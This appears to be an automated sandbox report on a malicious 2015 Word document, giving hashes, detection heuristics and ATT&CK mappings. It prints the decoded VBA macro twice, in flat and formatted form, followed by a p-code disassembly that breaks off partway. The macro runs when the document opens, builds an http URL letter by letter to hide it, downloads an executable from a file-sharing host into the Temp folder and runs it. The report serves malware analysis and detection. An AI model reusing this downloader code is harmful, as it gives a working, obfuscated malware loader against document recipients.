Office (OLE) malware analysis — malicious · b2094f324fdd98d5

MALICIOUS

Office (OLE)

37.5 KB Created: 2015-08-05 07:31:00 Authoring application: Microsoft Office Word First seen: 2015-10-03

MD5: c97d8946011adb303b8bed44cb5aee60 SHA-1: 3f745c55e5932d529a2e43fb5e1d888c89477b08 SHA-256: b2094f324fdd98d588ac6c4baacabb9db15ce6b87d2cbdfdd146b3e5da773ec2

278 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The macros utilize the URLDownloadToFile API to download a second-stage payload from the URL 'ge.tt/api/1/files/49EhufL2/0/blob?down' and save it to the temporary directory as 'scan_09889'. This indicates a downloader functionality, aiming to execute further malicious code.

Heuristics 8

ClamAV: Doc.Downloader.Generic-6754310-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6754310-0
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
        Shell BHGNVZMM, vbNormalFocus
```

URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA

Matched line in script

Private Declare PtrSafe Sub URLDownloadToFileA Lib "Urlmon.dll" (ByVal XEDKENEE As Long, ByVal CXIHOWIQ As String, _

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Sub Document_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
    BHGNVZMM = Environ("Temp") & "\" & "scan_09889"
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11670 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11670 bytes
SHA-256: `73bf1bead8f569a23486bf61afb5138516e8986a34ec4de0719e3d2cbc4fd652`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True #If Win64 Then Private Declare PtrSafe Sub URLDownloadToFileA Lib "Urlmon.dll" (ByVal XEDKENEE As Long, ByVal CXIHOWIQ As String, _ ByVal HZCTHZMF As String, _ ByVal PRQBAYQD As Long, ByVal KVPRWCHK As Long) #Else Private Declare Sub URLDownloadToFileA Lib "Urlmon.dll" (ByVal XEDKENEE As Long, ByVal CXIHOWIQ As String, _ ByVal HZCTHZMF As String, _ ByVal PRQBAYQD As Long, ByVal KVPRWCHK As Long) #End If Sub AutoNew() Dim SettingsFile As String Dim Order As String Dim rRecNo As Range SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini" If Order = "" Then Order = 1 End If End Sub Sub Document_Open() SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini" Dim sdfsd As String SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini" SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini" sdfsd = 15 PULAJZLO End Sub Sub PULAJZLO() SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini" Dim Order As String Dim rRecNo As Range SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini" If Order = "" Then Order = 1 End If MUUXZXSB = "ge.tt/api/1/files/49EhufL2/0/blob?down" BHGNVZMM = Environ("Temp") & "\" & "scan_09889" SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini" If Order = "" Then Order = 1 End If MUUXZXSB0 = "h" MUUXZXSB0 = MUUXZXSB0 + "t" SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini" MUUXZXSB0 = MUUXZXSB0 + "t" SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini" MUUXZXSB0 = MUUXZXSB0 + "p" SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini" MUUXZXSB0 = MUUXZXSB0 + ":" SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini" MUUXZXSB0 = MUUXZXSB0 + "/" SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini" MUUXZXSB0 = MUUXZXSB0 + "/" SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini" MUUXZXSB0 = MUUXZXSB0 + MUUXZXSB SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini" MUUXZXSB0 = MUUXZXSB0 + "." SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini" MUUXZXSB0 = MUUXZXSB0 + "e" SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini" MUUXZXSB0 = MUUXZXSB0 + "x" SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini" MUUXZXSB0 = MUUXZXSB0 + "e" AutoNew BHGNVZMM = BHGNVZMM + "." SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini" BHGNVZMM = BHGNVZMM + "e" SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini" BHGNVZMM = BHGNVZMM + "x" SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini" BHGNVZMM = BHGNVZMM + "e" SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini" AutoNew SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini" URLDownloadToFileA 0, MUUXZXSB0, _ BHGNVZMM, 0, 0 SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini" AutoNew If Len(Dir(BHGNVZMM)) > 0 Then AutoNew Shell BHGNVZMM, vbNormalFocus SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini" End If End Sub Attribute VB_Name = "NewMacros" Sub kudi() ' ' kudi Macro ' ' End Sub ' Processing file: /opt/analyzer/scan_staging/157b325715544436ab42fea0f160fd4a.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 6594 bytes ' Line #0: ' Line #1: ' LbMark ' Ld Project1 ' LbIf ' Line #2: ' Line #3: ' LineCont 0x0008 12 00 04 00 17 00 04 00 ' FuncDefn (Private Declare PtrSafe Sub PRQBAYQD Lib "rRecNo" (ByVal KVPRWCHK As Long, ByVal Urlmon.dll As String, ByVal AutoNew As String, ByVal SettingsFile As Long, ByVal Order As Long)) ' Line #4: ' Line #5: ' LbMark ' LbElse ' Line #6: ' Line #7: ' LineCont 0x0008 11 00 04 00 16 00 04 00 ' FuncDefn (Private Declare Sub PRQBAYQD Lib "rRecNo" (ByVal KVPRWCHK As Long, ByVal Urlmon.dll As String, ByVal AutoNew As String, ByVal SettingsFile As Long, ByVal Order As Long)) ' Line #8: ' Line #9: ' LbMark ' LbEndIf ' Line #10: ' Line #11: ' FuncDefn (Sub Range()) ' Line #12: ' Dim ' VarDefn Options (As String) ' Line #13: ' Dim ' VarDefn DefaultFilePath (As String) ' Line #14: ' Dim ' VarDefn wdStartupPath (As Document_Open) ' Line #15: ' Line #16: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\Settings.ini" ' Concat ' St Options ' Line #17: ' Line #18: ' Ld DefaultFilePath ' LitStr 0x0000 "" ' Eq ' IfBlock ' Line #19: ' LitDI2 0x0001 ' St DefaultFilePath ' Line #20: ' EndIfBlock ' Line #21: ' Line #22: ' EndSub ' Line #23: ' Line #24: ' FuncDefn (Sub BHGNVZMM()) ' Line #25: ' Line #26: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\Settings.ini" ' Concat ' St Options ' Line #27: ' Line #28: ' Dim ' VarDefn Environ (As String) ' Line #29: ' Line #30: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\Settings.ini" ' Concat ' St Options ' Line #31: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\Settings.ini" ' Concat ' St Options ' Line #32: ' Line #33: ' LitDI2 0x000F ' St Environ ' Line #34: ' Line #35: ' ArgsCall MUUXZXSB0 0x0000 ' Line #36: ' EndSub ' Line #37: ' Line #38: ' FuncDefn (Sub MUUXZXSB0()) ' Line #39: ' Line #40: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\qrgrgerg.ini" ' Concat ' St Options ' Line #41: ' Line #42: ' Line #43: ' Dim ' VarDefn DefaultFilePath (As String) ' Line #44: ' Dim ' VarDefn wdStartupPath (As Document_Open) ' Line #45: ' Line #46: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\Settings.ini" ' Concat ' St Options ' Line #47: ' Line #48: ' Ld DefaultFilePath ' LitStr 0x0000 "" ' Eq ' IfBlock ' Line #49: ' LitDI2 0x0001 ' St DefaultFilePath ' Line #50: ' EndIfBlock ' Line #51: ' Line #52: ' LitStr 0x0026 "ge.tt/api/1/files/49EhufL2/0/blob?down" ' St Shell ' Line #53: ' LitStr 0x0004 "Temp" ' ArgsLd _B_var_SettingsFile 0x0001 ' LitStr 0x0001 "\" ' Concat ' LitStr 0x000A "scan_09889" ' Concat ' St vbNormalFocus ' Line #54: ' Line #55: ' Line #56: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\qrgrgerg.ini" ' Concat ' St Options ' Line #57: ' Line #58: ' Ld DefaultFilePath ' LitStr 0x0000 "" ' Eq ' IfBlock ' Line #59: ' LitDI2 0x0001 ' St DefaultFilePath ' Line #60: ' EndIfBlock ' Line #61: ' Line #62: ' LitStr 0x0001 "h" ' St id_0258 ' Line #63: ' Ld id_0258 ' LitStr 0x0001 "t" ' Add ' St id_0258 ' Line #64: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\qrgrgerg.ini" ' Concat ' St Options ' Line #65: ' Ld id_0258 ' LitStr 0x0001 "t" ' Add ' St id_0258 ' Line #66: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\qrgrgerg.ini" ' Concat ' St Options ' Line #67: ' Ld id_0258 ' LitStr 0x0001 "p" ' Add ' St id_0258 ' Line #68: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\qrgrgerg.ini" ' Concat ' St Options ' Line #69: ' Ld id_0258 ' LitStr 0x0001 ":" ' Add ' St id_0258 ' Line #70: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\qrgrgerg.ini" ' Concat ' St Options ' Line #71: ' Ld id_0258 ' LitStr 0x0001 "/" ' Add ' St id_0258 ' Line #72: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\qrgrgerg.ini" ' Concat ' St Options ' Line #73: ' Ld id_0258 ' LitStr 0x0001 "/" ' Add ' St id_0258 ' Line #74: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\qrgrgerg.ini" ' Concat ' St Options ' Line #75: ' Ld id_0258 ' Ld Shell ' Add ' St id_0258 ' Line #76: ' Line #77: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\Settings.ini" ' Concat ' St Options ' Line #78: ' Line #79: ' Ld id_0258 ' LitStr 0x0001 "." ' Add ' St id_0258 ' Line #80: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\qrgrgerg.ini" ' Concat ' St Options ' Line #81: ' Ld id_0258 ' LitStr 0x0001 "e" ' Add ' St id_0258 ' Line #82: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\qrgrgerg.ini" ' Concat ' St Options ' Line #83: ' Ld id_0258 ' LitStr 0x0001 "x" ' Add ' St id_0258 ' Line #84: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\qrgrgerg.ini" ' Concat ' St Options ' Line #85: ' Ld id_0258 ' LitStr 0x0001 "e" ' Add ' St id_0258 ' Line #86: ' Line #87: ' ArgsCall Range 0x0000 ' Line #88: ' Line #89: ' Ld vbNormalFocus ' LitStr 0x0001 "." ' Add ' St vbNormalFocus ' Line #90: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\qrgrgerg.ini" ' Concat ' St Options ' Line #91: ' Ld vbNormalFocus ' LitStr 0x0001 "e" ' Add ' St vbNormalFocus ' Line #92: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\qrgrgerg.ini" ' Concat ' St Options ' Line #93: ' Ld vbNormalFocus ' LitStr 0x0001 "x" ' Add ' St vbNormalFocus ' Line #94: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\qrgrgerg.ini" ' Concat ' St Options ' Line #95: ' Ld vbNormalFocus ' LitStr 0x0001 "e" ' Add ' St vbNormalFocus ' Line #96: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\qrgrgerg.ini" ' Concat ' St Options ' Line #97: ' Line #98: ' ArgsCall Range 0x0000 ' Line #99: ' Line #100: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\qrgrgerg.ini" ' Concat ' St Options ' Line #101: ' Line #102: ' LineCont 0x0004 05 00 04 00 ' LitDI2 0x0000 ' Ld id_0258 ' Ld vbNormalFocus ' LitDI2 0x0000 ' LitDI2 0x0000 ' ArgsCall PRQBAYQD 0x0005 ' Line #103: ' Line #104: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\qrgrgerg.ini" ' Concat ' St Options ' Line #105: ' Line #106: ' ArgsCall Range 0x0000 ' Line #107: ' Line #108: ' Ld vbNormalFocus ' ArgsLd Dir 0x0001 ' FnLen ' LitDI2 0x0000 ' Gt ' IfBlock ' Line #109: ' ArgsCall Range 0x0000 ' Line #110: ' Ld vbNormalFocus ' Ld id_025C ' ArgsCall id_025A 0x0002 ' Line #111: ' Ld MUUXZXSB ' Ld sdfsd ' ArgsMemLd PULAJZLO 0x0001 ' LitStr 0x000D "\qrgrgerg.ini" ' Concat ' St Options ' Line #112: ' EndIfBlock ' Line #113: ' Line #114: ' EndSub ' Line #115: ' Macros/VBA/NewMacros - 1023 bytes ' Line #0: ' FuncDefn (Sub CXIHOWIQ()) ' Line #1: ' QuoteRem 0x0000 0x0000 "" ' Line #2: ' QuoteRem 0x0000 0x000B " kudi Macro" ' Line #3: ' QuoteRem 0x0000 0x0000 "" ' Line #4: ' QuoteRem 0x0000 0x0000 "" ' Line #5: ' Line #6: ' EndSub

SHA-256: 73bf1bead8f569a23486bf61afb5138516e8986a34ec4de0719e3d2cbc4fd652

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

#If Win64 Then

Private Declare PtrSafe Sub URLDownloadToFileA Lib "Urlmon.dll" (ByVal XEDKENEE As Long, ByVal CXIHOWIQ As String, _
    ByVal HZCTHZMF As String, _
    ByVal PRQBAYQD As Long, ByVal KVPRWCHK As Long)

#Else

Private Declare Sub URLDownloadToFileA Lib "Urlmon.dll" (ByVal XEDKENEE As Long, ByVal CXIHOWIQ As String, _
    ByVal HZCTHZMF As String, _
    ByVal PRQBAYQD As Long, ByVal KVPRWCHK As Long)

#End If

Sub AutoNew()
    Dim SettingsFile As String
    Dim Order As String
    Dim rRecNo As Range

    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini"
    
    If Order = "" Then
    Order = 1
    End If

End Sub

Sub Document_Open()

SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini"

    Dim sdfsd As String

    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini"

    sdfsd = 15

    PULAJZLO
End Sub

Sub PULAJZLO()

SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"

       
    Dim Order As String
    Dim rRecNo As Range

    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini"

    If Order = "" Then
    Order = 1
    End If

    MUUXZXSB = "ge.tt/api/1/files/49EhufL2/0/blob?down"
    BHGNVZMM = Environ("Temp") & "\" & "scan_09889"


    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"

    If Order = "" Then
    Order = 1
    End If
    
    MUUXZXSB0 = "h"
    MUUXZXSB0 = MUUXZXSB0 + "t"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    MUUXZXSB0 = MUUXZXSB0 + "t"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    MUUXZXSB0 = MUUXZXSB0 + "p"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    MUUXZXSB0 = MUUXZXSB0 + ":"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    MUUXZXSB0 = MUUXZXSB0 + "/"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    MUUXZXSB0 = MUUXZXSB0 + "/"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    MUUXZXSB0 = MUUXZXSB0 + MUUXZXSB

    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini"

    MUUXZXSB0 = MUUXZXSB0 + "."
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    MUUXZXSB0 = MUUXZXSB0 + "e"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    MUUXZXSB0 = MUUXZXSB0 + "x"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    MUUXZXSB0 = MUUXZXSB0 + "e"

    AutoNew

    BHGNVZMM = BHGNVZMM + "."
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    BHGNVZMM = BHGNVZMM + "e"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    BHGNVZMM = BHGNVZMM + "x"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    BHGNVZMM = BHGNVZMM + "e"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"

    AutoNew

    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"

    URLDownloadToFileA 0, MUUXZXSB0, _
    BHGNVZMM, 0, 0

    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"

    AutoNew

    If Len(Dir(BHGNVZMM)) > 0 Then
    AutoNew
        Shell BHGNVZMM, vbNormalFocus
        SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    End If

End Sub


Attribute VB_Name = "NewMacros"
Sub kudi()
'
' kudi Macro
'
'

End Sub

' Processing file: /opt/analyzer/scan_staging/157b325715544436ab42fea0f160fd4a.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 6594 bytes
' Line #0:
' Line #1:
' 	LbMark 
' 	Ld Project1 
' 	LbIf 
' Line #2:
' Line #3:
' 	LineCont 0x0008 12 00 04 00 17 00 04 00
' 	FuncDefn (Private Declare PtrSafe Sub PRQBAYQD Lib "rRecNo" (ByVal KVPRWCHK As Long, ByVal Urlmon.dll As String, ByVal AutoNew As String, ByVal SettingsFile As Long, ByVal Order As Long))
' Line #4:
' Line #5:
' 	LbMark 
' 	LbElse 
' Line #6:
' Line #7:
' 	LineCont 0x0008 11 00 04 00 16 00 04 00
' 	FuncDefn (Private Declare Sub PRQBAYQD Lib "rRecNo" (ByVal KVPRWCHK As Long, ByVal Urlmon.dll As String, ByVal AutoNew As String, ByVal SettingsFile As Long, ByVal Order As Long))
' Line #8:
' Line #9:
' 	LbMark 
' 	LbEndIf 
' Line #10:
' Line #11:
' 	FuncDefn (Sub Range())
' Line #12:
' 	Dim 
' 	VarDefn Options (As String)
' Line #13:
' 	Dim 
' 	VarDefn DefaultFilePath (As String)
' Line #14:
' 	Dim 
' 	VarDefn wdStartupPath (As Document_Open)
' Line #15:
' Line #16:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\Settings.ini"
' 	Concat 
' 	St Options 
' Line #17:
' Line #18:
' 	Ld DefaultFilePath 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #19:
' 	LitDI2 0x0001 
' 	St DefaultFilePath 
' Line #20:
' 	EndIfBlock 
' Line #21:
' Line #22:
' 	EndSub 
' Line #23:
' Line #24:
' 	FuncDefn (Sub BHGNVZMM())
' Line #25:
' Line #26:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\Settings.ini"
' 	Concat 
' 	St Options 
' Line #27:
' Line #28:
' 	Dim 
' 	VarDefn Environ (As String)
' Line #29:
' Line #30:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\Settings.ini"
' 	Concat 
' 	St Options 
' Line #31:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\Settings.ini"
' 	Concat 
' 	St Options 
' Line #32:
' Line #33:
' 	LitDI2 0x000F 
' 	St Environ 
' Line #34:
' Line #35:
' 	ArgsCall MUUXZXSB0 0x0000 
' Line #36:
' 	EndSub 
' Line #37:
' Line #38:
' 	FuncDefn (Sub MUUXZXSB0())
' Line #39:
' Line #40:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #41:
' Line #42:
' Line #43:
' 	Dim 
' 	VarDefn DefaultFilePath (As String)
' Line #44:
' 	Dim 
' 	VarDefn wdStartupPath (As Document_Open)
' Line #45:
' Line #46:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\Settings.ini"
' 	Concat 
' 	St Options 
' Line #47:
' Line #48:
' 	Ld DefaultFilePath 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #49:
' 	LitDI2 0x0001 
' 	St DefaultFilePath 
' Line #50:
' 	EndIfBlock 
' Line #51:
' Line #52:
' 	LitStr 0x0026 "ge.tt/api/1/files/49EhufL2/0/blob?down"
' 	St Shell 
' Line #53:
' 	LitStr 0x0004 "Temp"
' 	ArgsLd _B_var_SettingsFile 0x0001 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	LitStr 0x000A "scan_09889"
' 	Concat 
' 	St vbNormalFocus 
' Line #54:
' Line #55:
' Line #56:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #57:
' Line #58:
' 	Ld DefaultFilePath 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #59:
' 	LitDI2 0x0001 
' 	St DefaultFilePath 
' Line #60:
' 	EndIfBlock 
' Line #61:
' Line #62:
' 	LitStr 0x0001 "h"
' 	St id_0258 
' Line #63:
' 	Ld id_0258 
' 	LitStr 0x0001 "t"
' 	Add 
' 	St id_0258 
' Line #64:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #65:
' 	Ld id_0258 
' 	LitStr 0x0001 "t"
' 	Add 
' 	St id_0258 
' Line #66:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #67:
' 	Ld id_0258 
' 	LitStr 0x0001 "p"
' 	Add 
' 	St id_0258 
' Line #68:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #69:
' 	Ld id_0258 
' 	LitStr 0x0001 ":"
' 	Add 
' 	St id_0258 
' Line #70:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #71:
' 	Ld id_0258 
' 	LitStr 0x0001 "/"
' 	Add 
' 	St id_0258 
' Line #72:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #73:
' 	Ld id_0258 
' 	LitStr 0x0001 "/"
' 	Add 
' 	St id_0258 
' Line #74:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #75:
' 	Ld id_0258 
' 	Ld Shell 
' 	Add 
' 	St id_0258 
' Line #76:
' Line #77:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\Settings.ini"
' 	Concat 
' 	St Options 
' Line #78:
' Line #79:
' 	Ld id_0258 
' 	LitStr 0x0001 "."
' 	Add 
' 	St id_0258 
' Line #80:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #81:
' 	Ld id_0258 
' 	LitStr 0x0001 "e"
' 	Add 
' 	St id_0258 
' Line #82:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #83:
' 	Ld id_0258 
' 	LitStr 0x0001 "x"
' 	Add 
' 	St id_0258 
' Line #84:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #85:
' 	Ld id_0258 
' 	LitStr 0x0001 "e"
' 	Add 
' 	St id_0258 
' Line #86:
' Line #87:
' 	ArgsCall Range 0x0000 
' Line #88:
' Line #89:
' 	Ld vbNormalFocus 
' 	LitStr 0x0001 "."
' 	Add 
' 	St vbNormalFocus 
' Line #90:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #91:
' 	Ld vbNormalFocus 
' 	LitStr 0x0001 "e"
' 	Add 
' 	St vbNormalFocus 
' Line #92:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #93:
' 	Ld vbNormalFocus 
' 	LitStr 0x0001 "x"
' 	Add 
' 	St vbNormalFocus 
' Line #94:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #95:
' 	Ld vbNormalFocus 
' 	LitStr 0x0001 "e"
' 	Add 
' 	St vbNormalFocus 
' Line #96:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #97:
' Line #98:
